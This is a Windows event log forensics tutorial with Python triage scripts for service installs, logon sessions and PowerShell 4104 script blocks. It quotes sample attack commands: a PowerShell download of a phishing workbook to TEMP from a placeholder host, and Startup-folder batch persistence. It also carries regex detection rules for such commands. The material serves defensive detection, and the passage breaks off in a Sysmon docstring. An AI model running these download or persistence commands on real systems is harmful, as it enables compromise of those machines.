# Uncover Malicious Activity with Windows Event Log Analysis

## Windows Event Logs Overview

Uncovering malicious activity with **Windows Event Log Analysis** involves examining specific logs to identify abnormal behaviors, trace attackers' activities, and understand the scope of an incident.

**Path:** `C:\Windows\System32\winevt\logs`

The target system logs are located at:\
`C:\Cases\E\Windows\System32\winevt\logs`

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FulYdNUreJMpI8bx0rq5a%2FScreenshot(4).png?alt=media&#x26;token=099aa482-1492-4dcc-b597-c993d8de6f46" alt=""><figcaption></figcaption></figure>

We can see our logs using Event Viewer.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F0B7Alp4nZMgtL5rtJPD4%2FScreenshot(5).png?alt=media&#x26;token=d3299382-b4e9-460b-b429-89144bb274de" alt=""><figcaption></figcaption></figure>

## Analyzing Windows Event Logs with Event Log Explorer and EvtxECmd

Let's open the Application.evtx log file in Event Log Explorer.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FhAW8emUSKLbb2HkUtPji%2FScreenshot(6).png?alt=media&#x26;token=8937adc6-fdf0-40bf-9302-f57dbfda0b9a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FYPUaDg6q3DkfPQVVWB5J%2FScreenshot(7).png?alt=media&#x26;token=3640f272-3b87-46a4-9fa8-42869559822b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F1kJFPPz5Bb8gRO7DqL5d%2FScreenshot(8).png?alt=media&#x26;token=b2ceab27-9f01-4695-8c99-f3ec317ae8f6" alt=""><figcaption></figcaption></figure>

Let’s explore what can be achieved with this tool.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FLgvTCG1jz71caiywa0ZC%2FScreenshot(9).png?alt=media&#x26;token=10dd527f-ec9e-4568-8c04-9e59da7fd48d" alt=""><figcaption></figcaption></figure>

We can filter logs by Event ID, description text, time frame, and other criteria.

We can also use the EvtxECmd tool to parse every event log from the target system into CSV in one pass.

```bash
EvtxECmd.exe -d C:\Cases\E\Windows\System32\winevt\logs --csv C:\Cases\Analysis\EventLogs
```

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FcdCnxfZ5Ov4eFAaLxhH7%2FScreenshot(10).png?alt=media&#x26;token=fd4969bd-efeb-421e-952d-557a58bbb910" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FtwWS4of840och0NkYQDt%2FScreenshot(11).png?alt=media&#x26;token=385ef583-6bdc-43e8-96bc-155055a69731" alt=""><figcaption></figcaption></figure>

Let's open this file using Timeline Explorer.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FpF2ymwoCEWhWLeKRH33g%2FScreenshot(12).png?alt=media&#x26;token=ef668f17-867a-4e2a-b281-8f466417dc36" alt=""><figcaption></figcaption></figure>

We can sort or filter using any of these columns.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FIVolETuyx6PpYk60oWF6%2FScreenshot(14).png?alt=media&#x26;token=38246ac4-08e8-4f64-89fb-812d500e1b43" alt=""><figcaption></figcaption></figure>

## Windows Defender Event Log Analysis

Windows Defender, part of the built-in security suite in Windows, generates logs that provide detailed information about security-related activities on the system. These logs can be critical for detecting malicious behavior, monitoring threats, and troubleshooting security issues. Windows Defender logs events related to malware detection, scan results, real-time protection, and updates.

<table><thead><tr><th width="344">Source</th><th width="132">Event ID</th><th>Description</th></tr></thead><tbody><tr><td>Microsoft-Windows-Windows-Defender</td><td>5000</td><td>Defender Enabled</td></tr><tr><td>Microsoft-Windows-Windows-Defender</td><td>5001</td><td>Defender Disabled</td></tr></tbody></table>

## Analyzing Service Installs

When a new service is installed or modified on a Windows system, it generates event logs that can provide valuable information about the service's installation, configuration, and any changes made. By analyzing these event logs, you can detect malicious activities, unauthorized service installations, or changes to legitimate services.

**Event ID:** 7045 (A new service was installed)

Let's open the System.evtx log file in Event Log Explorer.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FwRFeOTJkCDSAXMt3V6BK%2FScreenshot(15).png?alt=media&#x26;token=21109d11-fd51-434c-94a4-e49fe05ad2c6" alt=""><figcaption></figcaption></figure>

Let's filter by Event ID 7045.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FChketqSHXbAX5qySGhIb%2FScreenshot(16).png?alt=media&#x26;token=a58cbb67-d558-4bde-aceb-a38ed5959f8b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FdAg76ua4DwOZyX2kNAPn%2FScreenshot(17).png?alt=media&#x26;token=6f3f7432-ac5c-4fe2-9d7e-cde18b4dc216" alt=""><figcaption></figcaption></figure>
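A small triage script for the 7045 records once they have been exported to CSV. This is an added example, not code from the page or from EvtxECmd / Event Log Explorer; the rows are constructed, use only a simplified subset of the columns EvtxECmd writes, and the `key=value` layout of the `Payload` column is an assumption made here. The field names (`ServiceName`, `ImagePath`, `StartType`, `AccountName`) are those of the 7045 event itself. The checks flag a service whose binary lives outside the Windows or Program Files trees, one that launches a command shell, and one whose command line points into a Temp directory.

```python
"""Triage System log Event ID 7045 (new service installed) records.

Added example; not from the original page or from any tool it describes.
The CSV below is constructed with a simplified subset of EvtxECmd's columns;
the key=value form of the Payload column is an assumption made here.
"""
import csv
import io
import re

SAMPLE_CSV = r"""TimeCreated,EventId,Channel,Computer,Payload
2024-01-15 09:02:11,7045,System,WS01,ServiceName=Windows Update Medic Service;ImagePath=%SystemRoot%\System32\svchost.exe -k wusvcs;ServiceType=user mode service;StartType=demand start;AccountName=LocalSystem
2024-01-15 09:15:43,7045,System,WS01,ServiceName=updsvc;ImagePath=%COMSPEC% /c C:\Windows\Temp\run.bat;ServiceType=user mode service;StartType=auto start;AccountName=LocalSystem
2024-01-15 09:16:02,7045,System,WS01,ServiceName=Helper;ImagePath="C:\Users\Public\helper.exe" -svc;ServiceType=user mode service;StartType=auto start;AccountName=LocalSystem
2024-01-15 09:20:00,7036,System,WS01,param1=Helper;param2=running
"""

# Common environment variables seen in ImagePath values.
ENV_VARS = {
    "%systemroot%": r"C:\Windows",
    "%windir%": r"C:\Windows",
    "%comspec%": r"C:\Windows\System32\cmd.exe",
}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def parse_payload(payload):
    """Split 'k1=v1;k2=v2' into a dict (layout assumed for this example)."""
    return dict(kv.split("=", 1) for kv in payload.split(";") if "=" in kv)


def image_binary(image_path):
    """Return the executable actually launched for a service ImagePath."""
    s = image_path.strip()
    for var, value in ENV_VARS.items():
        s = re.sub(re.escape(var), lambda _m, v=value: v, s, flags=re.IGNORECASE)
    if s.startswith('"'):                     # quoted path, possibly with arguments after it
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]                 # unquoted: first token is the binary


def triage_service_installs(csv_text):
    """Return one finding per 7045 record, with a (possibly empty) list of reasons."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["EventId"] != "7045":
            continue
        fields = parse_payload(row["Payload"])
        image_path = fields.get("ImagePath", "")
        binary = image_binary(image_path)
        low = binary.lower()
        reasons = []
        if not low.startswith(TRUSTED_DIRS):
            reasons.append("binary outside Windows/Program Files")
        if low.endswith(SHELLS):
            reasons.append("service runs a command shell")
        if "\\temp\\" in image_path.lower():
            reasons.append("command line references a Temp directory")
        findings.append({
            "time": row["TimeCreated"],
            "service": fields.get("ServiceName", "?"),
            "binary": binary,
            "start_type": fields.get("StartType", "?"),
            "account": fields.get("AccountName", "?"),
            "reasons": reasons,
        })
    return findings


def suspicious_services(csv_text):
    """Only the 7045 records that tripped at least one check."""
    return [f for f in triage_service_installs(csv_text) if f["reasons"]]


if __name__ == "__main__":
    for f in suspicious_services(SAMPLE_CSV):
        print(f"{f['time']}  {f['service']:<12} {f['binary']}  <- {', '.join(f['reasons'])}")
```

On the constructed rows the `svchost.exe` service passes, `updsvc` is reported for launching `cmd.exe` against a file under `C:\Windows\Temp`, and `Helper` is reported because its binary sits under `C:\Users\Public`. Real exports will need the `Payload` parsing adapted to the exact column layout of the tool used.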

## Security Event Log and Authentication Events

The **Security Event Log** on Windows systems records significant security-related events, including user logons, logoff activities, authentication attempts, and account management actions. Analyzing these events helps to detect potential security incidents such as unauthorized access, privilege escalation, or lateral movement within a network.

**Event ID:** 4624 (Successful Logon)

Let's open the Security.evtx log file in Event Log Explorer and filter by Event ID 4624.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FECYMXWcYOusZSbt87hDD%2FScreenshot(18).png?alt=media&#x26;token=b4678ca8-0cc1-4155-880b-e2b75152e945" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FTLKnXowvmCgigJiORZZS%2FScreenshot(19).png?alt=media&#x26;token=aa8f7f16-df3f-4c0c-b815-f6f47f76bc97" alt=""><figcaption></figcaption></figure>

The **Security ID (SID)** is a unique identifier assigned to a user, group, or computer account in Windows. It is used internally by the operating system to manage access to resources and track actions performed by specific accounts.

* `S-1-5-18`: Local System account.
* `S-1-5-19`: Local Service account.
* `S-1-5-20`: Network Service account.

**Logon types** describe how a user accessed the system. They are crucial for identifying the nature of an authentication event.

<table><thead><tr><th width="160">Logon Type</th><th width="205">Description</th><th>Use Case</th></tr></thead><tbody><tr><td>2</td><td>Interactive</td><td>Physical logon at a system (e.g., console).</td></tr><tr><td>3</td><td>Network</td><td>Access via network (e.g., SMB, web access).</td></tr><tr><td>10</td><td>RemoteInteractive</td><td>RDP or Terminal Services logon.</td></tr></tbody></table>

Let's filter by Account Name Sec504.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FPp6TiFStty9sVbvkwB84%2FScreenshot(21).png?alt=media&#x26;token=75dde2ca-ba17-49ea-b359-543d5eaf81a4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fw5aDMmNlDQJtNrqkKTtG%2FScreenshot(22).png?alt=media&#x26;token=49babf2f-c5c1-4b66-8d86-4824a79828e4" alt=""><figcaption></figcaption></figure>

## Authentication Events and Logon IDs

**Logon ID** is a unique hexadecimal identifier that correlates logon sessions across multiple event logs.

When you log in to a Windows system, it is common to see two Logon IDs generated: one for a **low-privilege session** and another for a **higher-privilege session**. This happens because Windows uses **User Account Control (UAC)** to manage privilege levels for interactive logons.

* **Low-Privilege Logon ID**:
  * When you log in interactively, Windows first creates a standard user session by default, even if you are an administrator.
  * This session operates under a **low-privilege token** to reduce the risk of accidental or malicious changes to the system.
  * It is associated with a **Logon Type 2** (Interactive Logon).
* **High-Privilege Logon ID**:
  * If you perform an action that requires administrative rights (e.g., running a program as an administrator), UAC creates a second session with a **high-privilege token**.
  * This session is linked to your account but is treated as a separate process requiring explicit elevation.
  * This elevated session will have its own **Logon ID**.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FZICJkGFBOxD079E9jur7%2FScreenshot(23).png?alt=media&#x26;token=ace3450e-0d05-4076-9897-3ae1429db092" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FTOU9PfEy3mzv5xuaxzuZ%2FScreenshot(24).png?alt=media&#x26;token=f3d93d0e-355e-46cf-a9bc-abd5fe8a381b" alt=""><figcaption></figcaption></figure>

Logon IDs play a crucial role in forensic investigations by enabling analysts to correlate different activities and actions performed during a specific session.

Let's review the actions associated with Logon ID **0xe64e2**.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FtJK8NawEl0LuQR7SXOHX%2FScreenshot(25).png?alt=media&#x26;token=4d328383-797b-470a-9a63-1a5f6ac75ef1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FwF4CrrmqFnhHIkFc1IKi%2FScreenshot(26).png?alt=media&#x26;token=2536eb8c-71c5-4729-a99e-e55b55bf6fac" alt=""><figcaption></figcaption></figure>

Let's review the actions associated with Logon ID **0xe64b4**.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2F7v5YeRHdEoB6OZdZWmmd%2FScreenshot(27).png?alt=media&#x26;token=2c186524-c411-47e7-8447-cdacadb91b71" alt=""><figcaption></figcaption></figure>

We can see that a new user has been added to the Administrators group.
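The correlation just performed by hand, written as code: index every 4624 by its `TargetLogonId`, then attach later events to a session through `SubjectLogonId` (for actions performed by the session) or `TargetLogonId` (for the session's own 4634 logoff). This is an added example, not from the page or from Event Log Explorer. The field names follow the 4624/4634/4732 event schemas (4732, "a member was added to a security-enabled local group", is the event behind the Administrators change seen above); the records are constructed, and the two Logon IDs reuse the values discussed on this page. `TargetLinkedLogonId` is the field that ties the two UAC split-token sessions together.

```python
"""Correlate Security log events by Logon ID.

Added example; not from the page or from Event Log Explorer. Field names are
those of the 4624/4634/4732 event schemas; the records are constructed, and
the Logon IDs 0xe64e2 / 0xe64b4 reuse the values discussed on the page.
"""

WELL_KNOWN_SIDS = {
    "S-1-5-18": "Local System",
    "S-1-5-19": "Local Service",
    "S-1-5-20": "Network Service",
}

LOGON_TYPES = {
    2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
    8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
    11: "CachedInteractive",
}

# Constructed records, in the order they would appear in Security.evtx.
EVENTS = [
    {"EventId": 4624, "TargetUserName": "SYSTEM", "TargetUserSid": "S-1-5-18",
     "TargetLogonId": "0x3e7", "LogonType": 5, "IpAddress": "-"},
    {"EventId": 4624, "TargetUserName": "Sec504", "TargetUserSid": "S-1-5-21-1111-2222-3333-1001",
     "TargetLogonId": "0xe64e2", "TargetLinkedLogonId": "0xe64b4", "LogonType": 2, "IpAddress": "127.0.0.1"},
    {"EventId": 4624, "TargetUserName": "Sec504", "TargetUserSid": "S-1-5-21-1111-2222-3333-1001",
     "TargetLogonId": "0xe64b4", "TargetLinkedLogonId": "0xe64e2", "LogonType": 2, "IpAddress": "127.0.0.1"},
    {"EventId": 4624, "TargetUserName": "admin", "TargetUserSid": "S-1-5-21-1111-2222-3333-500",
     "TargetLogonId": "0xf1234", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventId": 4732, "SubjectLogonId": "0xe64b4", "TargetUserName": "Administrators",
     "MemberSid": "S-1-5-21-1111-2222-3333-1002"},
    {"EventId": 4634, "TargetLogonId": "0xe64e2", "LogonType": 2},
]


def describe_action(ev):
    """One-line description of a non-logon event, for the session timeline."""
    eid = ev["EventId"]
    if eid == 4732:
        return f"4732: {ev['MemberSid']} added to local group {ev['TargetUserName']}"
    if eid == 4634:
        return "4634: logoff"
    return f"{eid}: (no description mapped)"


def build_sessions(events):
    """Index 4624 logons by TargetLogonId, then attach later events by Logon ID."""
    sessions = {}
    for ev in events:
        if ev["EventId"] == 4624:
            lt = ev["LogonType"]
            sessions[ev["TargetLogonId"]] = {
                "user": ev["TargetUserName"],
                "sid": ev["TargetUserSid"],
                "sid_label": WELL_KNOWN_SIDS.get(ev["TargetUserSid"], "domain/local account"),
                "logon_type": lt,
                "logon_type_name": LOGON_TYPES.get(lt, f"unknown({lt})"),
                "source_ip": ev.get("IpAddress", "-"),
                "linked": ev.get("TargetLinkedLogonId"),
                "actions": [],
            }
            continue
        # Actions performed *by* a session carry SubjectLogonId; the session's own
        # logoff (4634) carries its id in TargetLogonId.
        lid = ev.get("SubjectLogonId") or ev.get("TargetLogonId")
        if lid in sessions:
            sessions[lid]["actions"].append(describe_action(ev))
    return sessions


def uac_pairs(sessions):
    """Split-token (low/high privilege) session pairs that point at each other."""
    pairs = set()
    for lid, s in sessions.items():
        if s["linked"] in sessions and sessions[s["linked"]]["linked"] == lid:
            pairs.add(frozenset((lid, s["linked"])))
    return pairs


def session_report(sessions, logon_id):
    s = sessions[logon_id]
    lines = [f"Logon ID {logon_id}: {s['user']} ({s['sid_label']}), "
             f"type {s['logon_type']} {s['logon_type_name']}, from {s['source_ip']}"]
    if s["linked"]:
        lines.append(f"  linked UAC session: {s['linked']}")
    lines.extend(f"  {a}" for a in s["actions"])
    return "\n".join(lines)


if __name__ == "__main__":
    sessions = build_sessions(EVENTS)
    for lid in sessions:
        print(session_report(sessions, lid))
    print("UAC pairs:", [sorted(p) for p in uac_pairs(sessions)])
```

Running it shows the group change attributed to the elevated session `0xe64b4`, its link to the low-privilege session `0xe64e2`, and a separate type 3 network logon from `10.0.0.5` that shares no session with either. The same indexing works over an EvtxECmd CSV once the payload fields are parsed.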

## PowerShell Event Logs Overview

PowerShell provides detailed logging of its activities, which can be very useful in forensic investigations, especially when analyzing the execution of malicious scripts or tracking administrative activities. The logs capture events related to PowerShell script executions, command usage, and PowerShell module activities. These logs are particularly valuable for detecting malicious activity, lateral movement, or misuse of PowerShell for post-exploitation activities.

**Event ID:** 400 (Engine state is changed from none to available)

* This event logs the start of a PowerShell script execution. It includes:
  * **CommandLine**: The PowerShell command or script that was run.
  * **User**: The user who initiated the command.
  * **ScriptPath**: The location of the script, if applicable.
* **Use Case**: You can use this event to track the start of potentially malicious PowerShell scripts on the system.

**Event ID:** 403 (PowerShell script ended)

* This event logs the completion of a PowerShell script execution. It records:
  * **Exit Code**: The exit status of the script (successful or error).
  * **Duration**: The time taken for the script to execute.
* **Use Case**: Investigating the completion of PowerShell scripts, especially if the exit code indicates a failure or error during execution.

Two files are available. Let's load them into Event Log Explorer.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FlIosQZ3UHhnIL4mKFK9p%2FScreenshot.png?alt=media&#x26;token=67a0db45-22d3-475e-8667-044eaf77787f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FtPRjhdYJ1R0UXze5zTkY%2FScreenshot(2).png?alt=media&#x26;token=9c0ef502-ec3f-4951-9a9d-750848678c5e" alt=""><figcaption></figcaption></figure>

The **HostApplication** field in PowerShell event logs refers to the application that is running the PowerShell script or command. It helps identify which process is executing the PowerShell command. In the context of this example:

* **HostApplication**: `powershell.exe`
  * This indicates that the PowerShell command is being executed from the **PowerShell** executable, meaning that a standard PowerShell process is running the command.
* **Command**: `{Remove-Item -path $env:TEMP\deleteme_T1551.004}`
  * This is the PowerShell command being executed. In this case, the command is attempting to remove a file named `deleteme_T1551.004` located in the `TEMP` directory.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FaUnGQRIm3LJAfcn1mwRb%2FScreenshot(3).png?alt=media&#x26;token=3909b1bb-e678-4565-baf7-0006400365a2" alt=""><figcaption></figcaption></figure>

Regularly monitor Event ID 4104 to detect potentially malicious commands being executed in your environment, especially from non-administrative users or unexpected processes. If a system is compromised, Event ID 4104 will show what scripts or commands were executed by the attacker, helping you trace their activity.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2Fd49XSj5tiys7Ca1Y92Kn%2FScreenshot(4).png?alt=media&#x26;token=a33da9e1-b8a4-43b9-9128-7ef47bbe6020" alt=""><figcaption></figcaption></figure>

This command runs a PowerShell script that:

1. Sets the variable `$url` to the location of a malicious Excel file (`PhishingAttachment.xlsm`) hosted on GitHub.
2. Configures the PowerShell session to use **TLS 1.2** for secure communication (`[Net.ServicePointManager]::SecurityProtocol`).
3. Uses `Invoke-WebRequest` to download the malicious Excel file from the URL and saves it to the system's **TEMP** directory with the name `PhishingAttachment.xlsm`.

This type of command is typically used in phishing attacks, where a malicious file is downloaded and potentially executed to compromise the system.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FNu5pBQSwwlb2VYtS2iPL%2FScreenshot(6).png?alt=media&#x26;token=20d951ac-599c-49f3-a54f-56f1c32249ef" alt=""><figcaption></figcaption></figure>

Here's a brief explanation of what this command does:

1. **Copying the Batch File**:
   * It copies the file `batstartup.bat` from the source directory (`C:\AtomicRedTeam\atomics\T1547.001\src\batstartup.bat`) to two startup locations:
     * `$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat` (for the current user).
     * `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat` (for all users).
2. **Executing the Batch File**:
   * It uses `Start-Process` to run the batch file from both startup locations. This ensures that the batch file is executed every time the system starts, maintaining persistence.
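A rule-based triage of 4104 script blocks covering the three commands discussed in this section: the TEMP-directory deletion, the download to TEMP, and the Startup-folder persistence. This is an added example, not code from the page; the script-block texts are constructed to mirror those commands (with a placeholder URL), `ScriptBlockText` is the 4104 field name, and pairing each block with a `UserName` and `HostApplication` from the surrounding 400/403 events is an assumption made here. Besides the content rules it flags a host process other than the usual PowerShell executables and a high-severity block run by a user outside a supplied administrator set, which is the "non-administrative users or unexpected processes" check mentioned above.

```python
"""Rule-based triage of PowerShell Event ID 4104 script blocks.

Added example; not from the page. ScriptBlockText is the 4104 field; joining
UserName / HostApplication from 400/403 onto each block is assumed here, and
the script blocks are constructed (the URL is a placeholder).
"""
import re

# (name, severity, primary pattern, optional secondary pattern that must also match)
RULES = [
    ("download-to-temp", "high",
     re.compile(r"(Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString)", re.I),
     re.compile(r"(\$env:TEMP|\\Temp\\)", re.I)),
    ("startup-folder-persistence", "high",
     re.compile(r"(Copy-Item|Move-Item|Start-Process|Set-Content)", re.I),
     re.compile(r"Start Menu\\Programs\\Startup", re.I)),
    ("tls-override-before-download", "info",
     re.compile(r"ServicePointManager\]::SecurityProtocol", re.I), None),
    ("temp-file-deletion", "low",
     re.compile(r"Remove-Item", re.I),
     re.compile(r"\$env:TEMP", re.I)),
]
EXPECTED_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
SEVERITY_RANK = {"info": 0, "low": 1, "high": 2}

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed script blocks modelled on the commands discussed above.
SCRIPT_BLOCKS = [
    {"UserName": r"WS01\Sec504", "HostApplication": PS_EXE,
     "ScriptBlockText": r"Remove-Item -path $env:TEMP\deleteme_T1551.004"},
    {"UserName": r"WS01\Sec504", "HostApplication": PS_EXE + " -NoProfile",
     "ScriptBlockText": "\n".join([
         "$url = 'https://example.invalid/PhishingAttachment.xlsm'",
         "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12",
         r"Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm",
     ])},
    {"UserName": r"WS01\Sec504", "HostApplication": r"C:\Tools\updater.exe",
     "ScriptBlockText": r'Copy-Item C:\AtomicRedTeam\atomics\T1547.001\src\batstartup.bat '
                        r'"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"; '
                        r'Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"'},
    {"UserName": r"WS01\admin", "HostApplication": PS_EXE,
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
]


def host_executable(host_application):
    """Basename of the first token of HostApplication (it is a full command line)."""
    first = host_application.strip().strip('"').split(" ")[0]
    return first.rsplit("\\", 1)[-1].lower()


def evaluate_block(block, admin_users=frozenset()):
    """Return a finding dict for a block that matches any rule, else None."""
    text = block["ScriptBlockText"]
    hits, severities = [], []
    for name, severity, primary, secondary in RULES:
        if primary.search(text) and (secondary is None or secondary.search(text)):
            hits.append(name)
            severities.append(severity)
    host = host_executable(block.get("HostApplication", ""))
    if host not in EXPECTED_HOSTS:
        hits.append("unexpected-host")
        severities.append("high")
    if not hits:
        return None
    top = max(severities, key=SEVERITY_RANK.__getitem__)
    return {"user": block["UserName"], "host": host, "hits": hits, "severity": top,
            "non_admin_high": top == "high" and block["UserName"] not in admin_users}


def triage(blocks, admin_users=frozenset()):
    results = []
    for i, block in enumerate(blocks):
        finding = evaluate_block(block, admin_users)
        if finding:
            finding["index"] = i
            results.append(finding)
    return results


if __name__ == "__main__":
    for r in triage(SCRIPT_BLOCKS, admin_users={r"WS01\admin"}):
        flag = " [non-admin, high]" if r["non_admin_high"] else ""
        print(f"block {r['index']} {r['user']} via {r['host']}: {r['severity']} {r['hits']}{flag}")
```

The deletion is reported at low severity only, the download cradle at high severity together with the TLS override that precedes it, and the Startup-folder copy at high severity with the additional `unexpected-host` hit because the host process is not a PowerShell executable. Treat the patterns as a starting point; real script blocks are often split across several 4104 events and should be reassembled by `ScriptBlockId` before matching.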

## Detecting Malicious Events in Sysmon Event Logs

Detecting malicious activity in Sysmon logs involves analyzing specific event IDs and correlating patterns of suspicious behavior. Sysmon, or **System Monitor**, provides detailed information about system activity that can be used to detect anomalies and threats.

* **Event ID 1: Process Creation**
  * Logs every process start, including command-line arguments.
* **Event ID 3: Network Connection**
  * Logs TCP/UDP connections made by processes.
* **Event ID 7: Image Load**
  * Logs the DLLs loaded into each process, which can reveal injected or otherwise unusual libraries.
* **Event ID 8: CreateRemoteThread**
  * Tracks threads created in the address space of another process.
* **Event ID 11: File Creation**
  * Monitors file creation activities.
* **Event ID 12 & 13: Registry Key and Value Changes**
  * Tracks changes to the registry.
* **Event ID 22: DNS Query**
  * Logs DNS requests made by processes.

Let's open the "Microsoft-Windows-Sysmon" file and filter by Event ID 1 and the keyword "mavinject".

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FJjqhYMZ5tnBfLF2HNpcT%2FScreenshot.png?alt=media&#x26;token=5e9e7ade-b9c2-4a9c-b5c5-27dff6cc0126" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FsHmnXV2SPjODpnEywCXQ%2FScreenshot(2).png?alt=media&#x26;token=a0ff6d67-3e60-43be-ab39-4fc669c2f947" alt=""><figcaption></figcaption></figure>

Let's filter for Event ID 3 to analyze network connections.

<figure><img src="https://2537271824-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIswWWP3l0rGuQmG2WUcr%2Fuploads%2FHsY83hNpJi2AJ2xvy27n%2FScreenshot(3).png?alt=media&#x26;token=db0aa6f1-dabd-4acd-934a-20b73e77f8f1" alt=""><figcaption></figcaption></figure>
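The two filters applied above (Event ID 1 by keyword, then Event ID 3 for network connections) joined into a single pivot: find the process creations matching a keyword, then use `ProcessGuid` and `ParentProcessGuid` to pull the network connections, DNS queries and child processes of the hit and of its parent. This is an added example, not from the page or from Sysmon; the field names follow the Sysmon event schema, and the records, GUID placeholders and addresses are constructed (`203.0.113.0/24` and `example.invalid` are reserved test values).

```python
"""Pivot from a Sysmon Event ID 1 keyword hit to related Event ID 3 / 22 records.

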